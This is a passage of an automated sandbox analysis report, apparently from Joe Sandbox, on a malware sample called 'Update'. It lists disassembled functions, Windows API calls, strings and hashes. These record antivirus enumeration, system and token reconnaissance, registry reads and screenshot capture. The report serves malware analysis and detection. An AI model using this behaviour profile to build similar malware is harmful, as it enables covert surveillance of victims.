                                                                                            • GetSidSubAuthorityCount.ADVAPI32 ref: 034E6B98
                                                                                            • GetSidSubAuthority.ADVAPI32(00000000), ref: 034E6BA6
                                                                                            • LocalFree.KERNEL32(?), ref: 034E6BB5
                                                                                            • CloseHandle.KERNEL32(?), ref: 034E6BC2
                                                                                            • wsprintfW.USER32 ref: 034E6C1B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                                                                            • String ID: -N/$NO/$None/%s
                                                                                            • API String ID: 3036438616-3095023699
                                                                                            • Opcode ID: 2a58897ad59ba66bb6569a8d24d3aba712690ab7e47a1dda4449a7be3fb27772
                                                                                            • Instruction ID: 8b2f407b583f7a0b05814e610a78f3cb9888454b1b48ddb91432fc16d45e7492
                                                                                            • Opcode Fuzzy Hash: 2a58897ad59ba66bb6569a8d24d3aba712690ab7e47a1dda4449a7be3fb27772
                                                                                            • Instruction Fuzzy Hash: B5410870900328AFDB20DB61DD88FEF777CEB09306F05449AF6059A251DA39D985CF65
                                                                                            Function 034EAD10 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 346registryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1394 34ead10-34ead2b 1395 34ead2d-34ead5b RegOpenKeyExW 1394->1395 1396 34ead84-34ead8f 1394->1396 1397 34ead5d-34ead73 RegQueryValueExW 1395->1397 1398 34ead79-34ead7e 1395->1398 1399 34eb845-34eb84b call 34ece00 1396->1399 1400 34ead95-34ead9c 1396->1400 1397->1398 1398->1396 1402 34eb84e-34eb854 1398->1402 1399->1402 1403 34eadea-34eadf1 1400->1403 1404 34eafe3-34eb09b call 34ef707 call 34f6770 call 34eeff4 call 34f7660 call 34ef707 call 34ecf20 call 34eeff4 1400->1404 1403->1402 1407 34eadf7-34eae29 call 34ef707 call 34f6770 1403->1407 1449 34eb162-34eb189 call 34efa29 CloseHandle 1404->1449 1450 34eb0a1-34eb0ee call 34f7660 RegCreateKeyW 1404->1450 1416 34eae2b-34eae3f wsprintfW 1407->1416 1417 34eae42-34eae4e 1407->1417 1416->1417 1419 34eae9a-34eaef1 call 34eeff4 call 34f7660 call 34e2ba0 call 34eefff * 2 1417->1419 1420 34eae50 1417->1420 1422 34eae54-34eae5f 1420->1422 1425 34eae60-34eae66 1422->1425 1428 34eae68-34eae6b 1425->1428 1429 34eae86-34eae88 1425->1429 1433 34eae6d-34eae75 1428->1433 1434 34eae82-34eae84 1428->1434 1435 34eae8b-34eae8d 1429->1435 1433->1429 1438 34eae77-34eae80 1433->1438 1434->1435 1439 34eae8f-34eae98 1435->1439 1440 34eaef4-34eaf09 1435->1440 1438->1425 1438->1434 1439->1419 1439->1422 1444 34eaf10-34eaf16 1440->1444 1447 34eaf18-34eaf1b 1444->1447 1448 34eaf36-34eaf38 1444->1448 1452 34eaf1d-34eaf25 1447->1452 1453 34eaf32-34eaf34 1447->1453 1454 34eaf3b-34eaf3d 1448->1454 1471 34eb14a-34eb15f RegCloseKey call 34efac9 1450->1471 1472 34eb0f0-34eb13f call 34eeff4 call 34e5a30 RegDeleteValueW RegSetValueExW 1450->1472 1452->1448 1458 34eaf27-34eaf30 1452->1458 1453->1454 1459 34eafae-34eafe0 call 34efa29 CloseHandle call 34eefff 1454->1459 1460 34eaf3f-34eaf41 1454->1460 1458->1444 1458->1453 1461 34eaf55-34eaf5c 1460->1461 1462 34eaf43-34eaf4e call 34eefff 1460->1462 1469 34eaf5e-34eaf69 call 34efac9 1461->1469 1470 34eaf70-34eaf74 1461->1470 1462->1461 1469->1470 1477 34eaf76-34eaf7f call 34eefff 1470->1477 1478 34eaf85-34eafa9 call 34ef020 1470->1478 1471->1449 1472->1471 1490 34eb141-34eb147 call 34efac9 1472->1490 1477->1478 1478->1419 1490->1471
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 034EAD53
                                                                                            • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 034EAD73
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: OpenQueryValue
                                                                                            • String ID: %s_bin$Console$Console\0$IpDatespecial
                                                                                            • API String ID: 4153817207-1338088003
                                                                                            • Opcode ID: 90a4f54633eb1f2bf160212d9dda8b91b98d02d9bb52673cfb5d4f6e6da672a0
                                                                                            • Instruction ID: 1ee12bc365887a4f66ac5c7342be5b9d9dd08ab8c6144bb94c6341f25486e513
                                                                                            • Opcode Fuzzy Hash: 90a4f54633eb1f2bf160212d9dda8b91b98d02d9bb52673cfb5d4f6e6da672a0
                                                                                            • Instruction Fuzzy Hash: 29C1D1B5A00300AFE710EF24DC45F6BB3A8EF94715F08056EE9459F381E675E909C7AA
                                                                                            Function 034E6150 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 222stringcomregistryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1493 34e6150-34e61a5 call 34f6770 call 34f004b 1498 34e61a7-34e61ae 1493->1498 1499 34e6201-34e6228 CoCreateInstance 1493->1499 1502 34e61b0-34e61b2 call 34e6050 1498->1502 1500 34e622e-34e6282 1499->1500 1501 34e6422-34e642f lstrlenW 1499->1501 1510 34e640a-34e6418 1500->1510 1511 34e6288-34e62a2 1500->1511 1503 34e6441-34e6450 1501->1503 1504 34e6431-34e643b lstrcatW 1501->1504 1509 34e61b7-34e61b9 1502->1509 1506 34e645a-34e647a call 34ef00a 1503->1506 1507 34e6452-34e6457 1503->1507 1504->1503 1507->1506 1513 34e61db-34e61ff call 34f004b 1509->1513 1514 34e61bb-34e61d9 lstrcatW * 2 1509->1514 1510->1501 1516 34e641a-34e641f 1510->1516 1511->1510 1520 34e62a8-34e62b4 1511->1520 1513->1499 1513->1502 1514->1513 1516->1501 1521 34e62c0-34e6363 call 34f6770 wsprintfW RegOpenKeyExW 1520->1521 1524 34e63e9-34e63ff 1521->1524 1525 34e6369-34e63ba call 34f6770 RegQueryValueExW 1521->1525 1528 34e6402-34e6404 1524->1528 1529 34e63dc-34e63e3 RegCloseKey 1525->1529 1530 34e63bc-34e63da lstrcatW * 2 1525->1530 1528->1510 1528->1521 1529->1524 1530->1529
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034E618B
                                                                                            • lstrcatW.KERNEL32(03511F10,0350510C,?,DF800B7B,00000AD4,00000000,75BF73E0), ref: 034E61CD
                                                                                            • lstrcatW.KERNEL32(03511F10,0350535C,?,DF800B7B,00000AD4,00000000,75BF73E0), ref: 034E61D9
                                                                                            • CoCreateInstance.OLE32(03502480,00000000,00000017,0350578C,?,?,DF800B7B,00000AD4,00000000,75BF73E0), ref: 034E6220
                                                                                            • _memset.LIBCMT ref: 034E62CE
                                                                                            • wsprintfW.USER32 ref: 034E6336
                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 034E635F
                                                                                            • _memset.LIBCMT ref: 034E6376
                                                                                              • Part of subcall function 034E6050: _memset.LIBCMT ref: 034E607C
                                                                                              • Part of subcall function 034E6050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 034E6088
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                                                                            • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                            • API String ID: 1221949200-1583895642
                                                                                            • Opcode ID: 4ed7a80d0f8710bbbc1bd941311cb86661e877bd36c4d008b9ba0f335df92a50
                                                                                            • Instruction ID: 097e77e83873ae0f04a5666b469bcdd0bbb977d94aeac659084134999c89b3f4
                                                                                            • Opcode Fuzzy Hash: 4ed7a80d0f8710bbbc1bd941311cb86661e877bd36c4d008b9ba0f335df92a50
                                                                                            • Instruction Fuzzy Hash: 0181B5B1A00228AFDB20DB50DC44FAFB7B8EB44705F0445C9F718AB252D675AE45CF68
                                                                                            Function 034E5F40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 88sleepstringsynchronizationCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1531 34e5f40-34e5f7b CreateMutexW GetLastError 1532 34e5f7d 1531->1532 1533 34e5f9b-34e5fa2 1531->1533 1534 34e5f80-34e5f99 Sleep CreateMutexW GetLastError 1532->1534 1535 34e5fa4-34e5faa 1533->1535 1536 34e6003-34e602d GetModuleHandleW GetConsoleWindow call 34ee4f0 1533->1536 1534->1533 1534->1534 1537 34e5fb0-34e5fe1 call 34f6770 lstrlenW call 34e6d70 1535->1537 1541 34e602f-34e6045 call 34ef00a 1536->1541 1542 34e6048-34e604f call 34ee850 1536->1542 1550 34e5ff3-34e6001 Sleep 1537->1550 1551 34e5fe3-34e5ff1 lstrcmpW 1537->1551 1550->1536 1550->1537 1551->1536 1551->1550
                                                                                            APIs
                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,2024.12.27), ref: 034E5F66
                                                                                            • GetLastError.KERNEL32 ref: 034E5F6E
                                                                                            • Sleep.KERNEL32(000003E8), ref: 034E5F85
                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,2024.12.27), ref: 034E5F90
                                                                                            • GetLastError.KERNEL32 ref: 034E5F92
                                                                                            • _memset.LIBCMT ref: 034E5FB9
                                                                                            • lstrlenW.KERNEL32(?), ref: 034E5FC6
                                                                                            • lstrcmpW.KERNEL32(?,03505328), ref: 034E5FED
                                                                                            • Sleep.KERNEL32(000003E8), ref: 034E5FF8
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 034E6005
                                                                                            • GetConsoleWindow.KERNEL32 ref: 034E600F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                                                                            • String ID: 2024.12.27$key$open
                                                                                            • API String ID: 2922109467-156330446
                                                                                            • Opcode ID: 7bbf515200b4a8936f41da4251072f78e4f03f13fe5df146b6b8a1d149724fd3
                                                                                            • Instruction ID: ac1edd3bea5ab24855bcc466ff897fe02fe4b3c5e923f3187b6ffbeb72b59d23
                                                                                            • Opcode Fuzzy Hash: 7bbf515200b4a8936f41da4251072f78e4f03f13fe5df146b6b8a1d149724fd3
                                                                                            • Instruction Fuzzy Hash: DE210C725043059FD614EBB0EC45F5E7398AB94709F140C1AE6049B1D5DB71E50DCBA7
                                                                                            Function 6C388A70 Relevance: 21.5, APIs: 9, Strings: 3, Instructions: 539comCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1552 6c388a70-6c388b30 call 6c386110 1555 6c388b32 1552->1555 1556 6c388b34-6c388b46 1552->1556 1555->1556 1557 6c388b78-6c388b8a 1556->1557 1558 6c388b48-6c388b76 call 6c372c20 1556->1558 1560 6c388b8c 1557->1560 1561 6c388b92-6c388ba9 call 6c38f020 1557->1561 1564 6c388baf-6c388bda 1558->1564 1560->1561 1561->1564 1566 6c388c1a-6c388c3e 1564->1566 1567 6c388bdc-6c388beb 1564->1567 1568 6c388c7e-6c388c87 1566->1568 1569 6c388c40-6c388c4f 1566->1569 1570 6c388bed-6c388c03 1567->1570 1571 6c388c10-6c388c17 call 6c38aa43 1567->1571 1575 6c388c89-6c388c98 1568->1575 1576 6c388cc3-6c388cc7 1568->1576 1573 6c388c51-6c388c67 1569->1573 1574 6c388c74-6c388c7b call 6c38aa43 1569->1574 1577 6c388c09-6c388c0e 1570->1577 1578 6c3891ea call 6c393a5e 1570->1578 1571->1566 1573->1578 1582 6c388c6d-6c388c72 1573->1582 1574->1568 1584 6c388cb9-6c388cc0 call 6c38aa43 1575->1584 1585 6c388c9a-6c388ca5 1575->1585 1580 6c388cc9-6c388ccc 1576->1580 1581 6c388cce 1576->1581 1577->1571 1590 6c3891ef-6c389216 call 6c3726c0 call 6c3729d0 1578->1590 1587 6c388cd1-6c388cdb GetFileAttributesA 1580->1587 1581->1587 1582->1574 1584->1576 1585->1578 1589 6c388cab-6c388cb7 1585->1589 1592 6c388ce1-6c388cf7 SHGetFolderPathA 1587->1592 1593 6c389197-6c38919d 1587->1593 1589->1584 1592->1593 1598 6c388cfd-6c388d1d call 6c3957a0 1592->1598 1596 6c38919f-6c3891ab 1593->1596 1597 6c3891d6-6c3891e9 1593->1597 1600 6c3891cc-6c3891d3 call 6c38aa43 1596->1600 1601 6c3891ad-6c3891c3 1596->1601 1598->1590 1609 6c388d23-6c388d28 1598->1609 1600->1597 1601->1578 1605 6c3891c5-6c3891ca 1601->1605 1605->1600 1610 6c388d49-6c388d6c 1609->1610 1611 6c388d2a-6c388d47 call 6c38f020 1609->1611 1613 6c388d8d-6c388d9f call 6c38aa0e 1610->1613 1614 6c388d6e-6c388d8b call 6c38aa0e 1610->1614 1619 6c388dc3-6c388dce 1611->1619 1621 6c388da1-6c388dc1 call 6c38f020 1613->1621 1614->1621 1622 6c388e0c-6c388e2a 1619->1622 1623 6c388dd0-6c388e0a call 6c372c20 1619->1623 1621->1619 1626 6c388e2c 1622->1626 1627 6c388e2f-6c388e33 1622->1627 1630 6c388e37-6c388e69 1623->1630 1626->1627 1627->1630 1631 6c388e6b 1630->1631 1632 6c388e6d-6c388e7f 1630->1632 1631->1632 1633 6c388eb0-6c388ec1 1632->1633 1634 6c388e81-6c388eae call 6c372c20 1632->1634 1636 6c388ec9-6c388ed8 call 6c38f020 1633->1636 1637 6c388ec3 1633->1637 1640 6c388edc-6c388f17 1634->1640 1636->1640 1637->1636 1642 6c388f19-6c388f4d call 6c372c20 1640->1642 1643 6c388f4f-6c388f63 1640->1643 1648 6c388f77-6c388fa2 1642->1648 1645 6c388f6b-6c388f72 1643->1645 1646 6c388f65 1643->1646 1645->1648 1646->1645 1649 6c388fa4-6c388fb3 1648->1649 1650 6c388fd7-6c388ffb 1648->1650 1651 6c388fcd-6c388fd4 call 6c38aa43 1649->1651 1652 6c388fb5-6c388fc0 1649->1652 1653 6c388ffd-6c38900c 1650->1653 1654 6c389030-6c389051 1650->1654 1651->1650 1652->1578 1655 6c388fc6-6c388fcb 1652->1655 1657 6c38900e-6c389019 1653->1657 1658 6c389026-6c38902d call 6c38aa43 1653->1658 1659 6c389083-6c389087 1654->1659 1660 6c389053-6c38905f 1654->1660 1655->1651 1657->1578 1664 6c38901f-6c389024 1657->1664 1658->1654 1662 6c389089-6c38908c 1659->1662 1663 6c38908e 1659->1663 1666 6c389079-6c389080 call 6c38aa43 1660->1666 1667 6c389061-6c38906c 1660->1667 1670 6c389091-6c38909b GetFileAttributesA 1662->1670 1663->1670 1664->1658 1666->1659 1667->1578 1668 6c389072-6c389077 1667->1668 1668->1666 1673 6c3890a1-6c3890c3 CoInitialize CoCreateInstance 1670->1673 1674 6c389163-6c389169 1670->1674 1675 6c3890c9-6c3890cd 1673->1675 1676 6c38915d CoUninitialize 1673->1676 1674->1593 1677 6c38916b-6c389177 1674->1677 1678 6c3890cf-6c3890d2 1675->1678 1679 6c3890d4 1675->1679 1676->1674 1680 6c389179-6c389184 1677->1680 1681 6c38918d-6c389194 call 6c38aa43 1677->1681 1683 6c3890d7-6c389116 MultiByteToWideChar 1678->1683 1679->1683 1680->1578 1684 6c389186-6c38918b 1680->1684 1681->1593 1688 6c389118-6c38911c 1683->1688 1689 6c389154-6c389159 1683->1689 1684->1681 1690 6c38911e-6c389121 1688->1690 1691 6c389123 1688->1691 1689->1676 1692 6c389126-6c389147 MultiByteToWideChar 1690->1692 1691->1692 1693 6c38914b-6c389150 1692->1693 1693->1689
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 6C388CD2
                                                                                            • SHGetFolderPathA.SHELL32 ref: 6C388CEF
                                                                                            • _strlen.LIBCMT ref: 6C388D13
                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 6C389092
                                                                                            • CoInitialize.OLE32(00000000), ref: 6C3890A3
                                                                                            • CoCreateInstance.OLE32(6C3AF3C0,00000000,00000001,6C3AEC50,?), ref: 6C3890BB
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104), ref: 6C3890EA
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104), ref: 6C389139
                                                                                            • CoUninitialize.COMBASE ref: 6C38915D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesByteCharFileMultiWide$CreateFolderInitializeInstancePathUninitialize_strlen
                                                                                            • String ID: \$e\$n7;l
                                                                                            • API String ID: 1074249417-465262852
                                                                                            • Opcode ID: 0a96cc9db23ae2891380c1dd5e5f1498917bea51a5d2ab74a7e27763ed7f6cf7
                                                                                            • Instruction ID: c1366e3617691413af2cc68c8d13c996cdcedd12d332fe9dbd317e1923b7b160
                                                                                            • Opcode Fuzzy Hash: 0a96cc9db23ae2891380c1dd5e5f1498917bea51a5d2ab74a7e27763ed7f6cf7
                                                                                            • Instruction Fuzzy Hash: 833211B1D052188FEB24CF24CC887EEBBB5FF45304F144699E459AB690DB359A84CF92
                                                                                            Function 034E62B6 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 125stringregistryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1694 34e62b6-34e62bd 1695 34e62c0-34e6363 call 34f6770 wsprintfW RegOpenKeyExW 1694->1695 1698 34e63e9-34e63ff 1695->1698 1699 34e6369-34e6376 call 34f6770 1695->1699 1702 34e6402-34e6404 1698->1702 1701 34e637b-34e63ba RegQueryValueExW 1699->1701 1703 34e63dc-34e63e3 RegCloseKey 1701->1703 1704 34e63bc-34e63da lstrcatW * 2 1701->1704 1702->1695 1705 34e640a-34e6418 1702->1705 1703->1698 1704->1703 1706 34e641a-34e641f 1705->1706 1707 34e6422-34e642f lstrlenW 1705->1707 1706->1707 1708 34e6441-34e6450 1707->1708 1709 34e6431-34e643b lstrcatW 1707->1709 1710 34e645a-34e647a call 34ef00a 1708->1710 1711 34e6452-34e6457 1708->1711 1709->1708 1711->1710
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034E62CE
                                                                                            • wsprintfW.USER32 ref: 034E6336
                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 034E635F
                                                                                            • _memset.LIBCMT ref: 034E6376
                                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 034E63B2
                                                                                            • lstrcatW.KERNEL32(03511F10,?), ref: 034E63CE
                                                                                            • lstrcatW.KERNEL32(03511F10,0350535C), ref: 034E63DA
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 034E63E3
                                                                                            • lstrlenW.KERNEL32(03511F10,?,DF800B7B,00000AD4,00000000,75BF73E0), ref: 034E6427
                                                                                            • lstrcatW.KERNEL32(03511F10,035053D4,?,DF800B7B,00000AD4,00000000,75BF73E0), ref: 034E643B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                                                                            • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                            • API String ID: 1671694837-1583895642
                                                                                            • Opcode ID: 5a999b38c185cdb10361d57cefcd23e70090f002862fa14a6637ad63da83836b
                                                                                            • Instruction ID: a8f66dfa65cdab9965a66e0dfc3f9c82cdba24433fd2f7bc7423c43fe2ad4c0e
                                                                                            • Opcode Fuzzy Hash: 5a999b38c185cdb10361d57cefcd23e70090f002862fa14a6637ad63da83836b
                                                                                            • Instruction Fuzzy Hash: E741A2F1A002686EDB24DB50CC54FEEB7B8AB48705F0445C9F309AB191D675AB85CF68
                                                                                            Function 034E7490 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 99registrylibraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,75BF73E0,?,?,?,034E5611,0000035E,000002FA), ref: 034E749C
                                                                                            • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 034E74B2
                                                                                            • swprintf.LIBCMT ref: 034E74EF
                                                                                              • Part of subcall function 034E7410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,034E7523), ref: 034E743D
                                                                                              • Part of subcall function 034E7410: GetProcAddress.KERNEL32(00000000), ref: 034E7444
                                                                                              • Part of subcall function 034E7410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,034E7523), ref: 034E7452
                                                                                            • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 034E7547
                                                                                            • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 034E7563
                                                                                            • RegCloseKey.KERNEL32(000002FA), ref: 034E7586
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,034E5611,0000035E,000002FA), ref: 034E7598
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                                                                            • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                                            • API String ID: 2158625971-3190923360
                                                                                            • Opcode ID: 862bb9b30c3b0a1ffd914887966283344c2e4aa5b2b4ce40ce50b7f9ab5777f0
                                                                                            • Instruction ID: a83de14aa000f9fd35938226b6fd543417b0a25151d61e80ef63c195fb64df65
                                                                                            • Opcode Fuzzy Hash: 862bb9b30c3b0a1ffd914887966283344c2e4aa5b2b4ce40ce50b7f9ab5777f0
                                                                                            • Instruction Fuzzy Hash: DB31E876A003087FDB14EBA4DD45FBF7B7CEF48710F140919BA15AA285E671DA04CB60
                                                                                            Function 034EC060 Relevance: 19.7, APIs: 13, Instructions: 179memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GlobalAlloc.KERNEL32(00000002,?,DF800B7B,?,00000000,?), ref: 034EC09E
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 034EC0AA
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 034EC0BF
                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 034EC0D5
                                                                                            • EnterCriticalSection.KERNEL32(0350FB64), ref: 034EC113
                                                                                            • LeaveCriticalSection.KERNEL32(0350FB64), ref: 034EC124
                                                                                              • Part of subcall function 034E9DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 034E9E04
                                                                                              • Part of subcall function 034E9DE0: GdipDisposeImage.GDIPLUS(?), ref: 034E9E18
                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 034EC14C
                                                                                              • Part of subcall function 034EA460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 034EA48D
                                                                                              • Part of subcall function 034EA460: _free.LIBCMT ref: 034EA503
                                                                                            • GetHGlobalFromStream.OLE32(?,?), ref: 034EC16D
                                                                                            • GlobalLock.KERNEL32(?), ref: 034EC177
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 034EC18F
                                                                                              • Part of subcall function 034E9BA0: DeleteObject.GDI32(?), ref: 034E9BD2
                                                                                              • Part of subcall function 034E9BA0: EnterCriticalSection.KERNEL32(0350FB64,?,?,?,034E9B7B), ref: 034E9BE3
                                                                                              • Part of subcall function 034E9BA0: EnterCriticalSection.KERNEL32(0350FB64,?,?,?,034E9B7B), ref: 034E9BF8
                                                                                              • Part of subcall function 034E9BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,034E9B7B), ref: 034E9C04
                                                                                              • Part of subcall function 034E9BA0: LeaveCriticalSection.KERNEL32(0350FB64,?,?,?,034E9B7B), ref: 034E9C15
                                                                                              • Part of subcall function 034E9BA0: LeaveCriticalSection.KERNEL32(0350FB64,?,?,?,034E9B7B), ref: 034E9C1C
                                                                                            • GlobalSize.KERNEL32(00000000), ref: 034EC1A5
                                                                                            • GlobalUnlock.KERNEL32(?), ref: 034EC221
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 034EC249
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                                                                            • String ID:
                                                                                            • API String ID: 1483550337-0
                                                                                            • Opcode ID: a173463365f10bb8d6dfc740372fd2de755135b70180c2d5b686acfbd8791c5b
                                                                                            • Instruction ID: 3d8ce73adcf526b6bd082783e164fe1633b5ff8d317434b447755cd2e1d0700c
                                                                                            • Opcode Fuzzy Hash: a173463365f10bb8d6dfc740372fd2de755135b70180c2d5b686acfbd8791c5b
                                                                                            • Instruction Fuzzy Hash: A56148B5D00218AFCB10EFE9D888D9EBBB8FF48304F14852EE515AB251DB359906CF94
                                                                                            Function 6C389B10 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 353threadsynchronizationCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 6C3893E0: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 6C38941E
                                                                                              • Part of subcall function 6C3893E0: _strlen.LIBCMT ref: 6C38943A
                                                                                            • _strlen.LIBCMT ref: 6C389B62
                                                                                            • _strlen.LIBCMT ref: 6C389CD0
